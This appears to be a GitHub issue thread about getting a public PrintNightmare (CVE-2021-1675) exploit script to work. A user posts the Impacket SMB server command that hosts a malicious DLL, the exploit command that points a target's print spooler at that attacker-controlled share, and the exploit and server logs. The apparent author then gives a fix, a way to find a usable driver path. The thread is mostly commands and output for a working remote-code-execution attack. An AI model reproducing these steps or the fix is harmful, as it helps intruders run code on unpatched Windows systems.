impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION

Question

impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION

sunny0day opened this issue 3 years ago · 4 comments

Start SMB server with Impacket:
sudo examples/smbserver.py -smb2support -ts smb /xxx/PrintNightmare/smb

Run exploit:
python CVE-2021-1675.py -port 445 'xxx/xxx:xxx/@xxx' '\10.33.69.214\smb\nightmare.dll' 'C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL'

Exploit log:

[*] Connecting to ncacn_np:xxx[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL
[*] Executing \\10.33.69.214\smb\nightmare.dll
[*] Try 1...
Traceback (most recent call last):
  File "xxx/CVE-2021-1675-cube0x0/CVE-2021-1675.py", line 176, in <module>
    main(dce, pDriverPath, options.share)
  File "xxx/CVE-2021-1675-cube0x0/CVE-2021-1675.py", line 84, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "xxx/CVE-2021-1675-cube0x0/venv/lib/python3.9/site-packages/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "xxx/CVE-2021-1675-cube0x0/venv/lib/python3.9/site-packages/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION - The process cannot access the file because it is being used by another process.

SMB log:

[2021-07-05 12:31:44] [*] Disconnecting Share(1:smb)
[2021-07-05 12:31:44] [*] Closing down connection (10.33.48.25,58737)
[2021-07-05 12:31:44] [*] Remaining connections []
[2021-07-05 12:31:48] [*] Incoming connection (10.33.48.25,57754)
[2021-07-05 12:31:48] [*] AUTHENTICATE_MESSAGE (\,xxx)
[2021-07-05 12:31:48] [*] User xxx\ authenticated successfully
[2021-07-05 12:31:48] [*] :::00::aaaaaaaaaaaaaaaa
[2021-07-05 12:31:49] [*] Connecting Share(1:smb)

Wireshark screenshot:

Unimplemented dissector: SPOOLSS
Return code: Share mode on file conflict with open mode (0x00000020)

Is anyone familiar with this error?

Answer 1 · 2021-07-05T11:50:14.000Z

paste full input and output please

Answer 2 · 2021-07-05T13:26:49.000Z

@cube0x0 I've added details to the initial post.

Answer 3 · 2021-07-05T14:40:33.000Z

C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL cannot be used, remove it from args and let the script find the correct path or enum like below

Get-PrinterDriver |select Path

Path
----
C:\WINDOWS\System32\DriverStore\FileRepository\ntprint.inf_amd64_c62e9f8067f98247\Amd64\mxdwdrv.dll

Answer 4 · 2021-07-05T14:53:48.000Z

@cube0x0 for your information, this is the result without specifying a path:

python CVE-2021-1675.py -port 445 'xxx/xxx:xxx/@xxx' '\\10.33.69.214\smb\whatanightmare.dll'
[*] Connecting to ncacn_np:xxx[\PIPE\spoolss]
[+] Bind OK
[-] pDriverPath C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL, expected :\Windows\System32\DriverStore\FileRepository\.....
[-] Specify pDriverPath manually